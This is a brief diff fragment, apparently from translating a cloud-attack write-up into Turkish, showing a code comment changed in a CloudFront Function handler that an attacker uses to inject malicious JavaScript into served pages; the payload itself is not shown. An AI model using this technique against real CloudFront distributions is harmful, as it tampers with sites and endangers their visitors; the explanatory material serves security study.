--query 'ETag' --output text)
@@ -59,7 +59,7 @@ The attacker creates a malicious CloudFront Function that injects JavaScript int
function handler(event) {
var request = event.request;
var response = event.response;
-// Create a new body with malicious JavaScript
+// Kötü amaçlı JavaScript içeren yeni bir body oluştur
var maliciousBody = `
@@ -70,15 +70,15 @@ var maliciousBody = `
Original Content
This page has been modified by CloudFront Functions